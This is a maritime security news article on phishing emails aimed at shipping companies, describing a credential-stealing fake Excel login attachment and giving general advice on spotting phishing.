In their weekly list of malicious emails to shipping companies for the second week of April, maritime security firm Dryad Global and its cyber security partners, Red Sky Alliance, observed a large percentage of these emails attempting to deliver Windows trojan malware.
The partners perform weekly queries of backend databases, identifying all new data containing Motor Vessel (MV) and Motor Tanker (MT) in the subject line of malicious emails.
The identified emails attempted to deliver malware or phishing links to compromise the vessels and/or parent companies.
Users should be aware of the subject lines used and the email addresses that are attempting to deliver the messages.
Some of the new vessel names used this week included “MT Ocean Star” and we see “MV Phuong Dong 06”, among others.
In addition, this week, analysts observed a phishing email using the subject line of “PO#01391-04// EXP SHIPMENT// CARGO.”
Many of the most common phishing emails attackers use contain the phrase “PO” or “Purchase Order.” These emails often reach financial departments which have access to sensitive company information.
The email contains a malicious .htm file attachment. When opened, the file shows a login window for “MicroSoft Excel.” The malware even auto fills the username with the victim email address.
When the user enters their correct credentials, the malware captures the input and sends it to the attacker.
Although the login looks suspicious, the fact that it only accepts the correct username/password input indicates that it’s linked to a legitimate MS Office login portal.
These analysis results illustrate how a recipient could be fooled into opening an infected email.
Cyber threat and COVID-19 scammers
Meanwhile, COVID-19 seems to be providing a fruitful field for cyber attacks;Recent reports say scammers are taking advantage of the fear and doubt created by the pandemic, attacking to those who are looking for protection.
Therefore, ICC's Cyber Threat Intelligence (CTI) team provided tips for cyber resilience amid the COVID-19 situation.
Recommendations
Preventative cyber protection offers a strong first-line defense, but malicious hackers are developing new techniques to evade current detection daily.
To address this residual risk, software-based protection should be treated as one constituent of a wider strategy that also encompasses the human-element as well as organizational workflows and procedures,
...Dryad notes.
As such, Dryad advises companies to:
- Train all levels of the marine supply chain to realize they are under constant cyber-attack.
- Stress maintaining constant attention to real-world cyber consequences of careless cyber practices or general inattentiveness.
- Provide practical guidance on how to look for a potential phishing attempt.
- Use direct communication to verify emails and supply chain email communication.
SAFETY4SEA has earlier provided 5 tips to identify a phishing e-mail:
- Check the display name: Just because it is coming from a name you may know it does not mean that this is the case. Always look at the email address, not just the sender.
- Is the e-mail asking for personal information? Legitimate companies are unlikely to ask personal information in an e-mail, at least without informing you first in some other way and validating that the information will be secured. Don’t give up personal information unless you are absolutely certain whom that information goes to.
- Has the e-mail an urgent tone?By creating a climate of emergency, the potential hacker aims to create panic so that the recipient won’t have much time to think and act recklessly. Beware of urgent or threatening language, particularly in the subject line.
- Is the e-mail properly signed? It is a key feature of legitimate e-mails that senders include a full signature block at the bottom, while businesses always provide contact details.
- Is the e-mail grammatically correct?Potential attackers are often less concerned about spelling or grammatical consistency than a normal sender would be.
https://safety4sea.com/malicious-emails-against-shipping-companies-continue/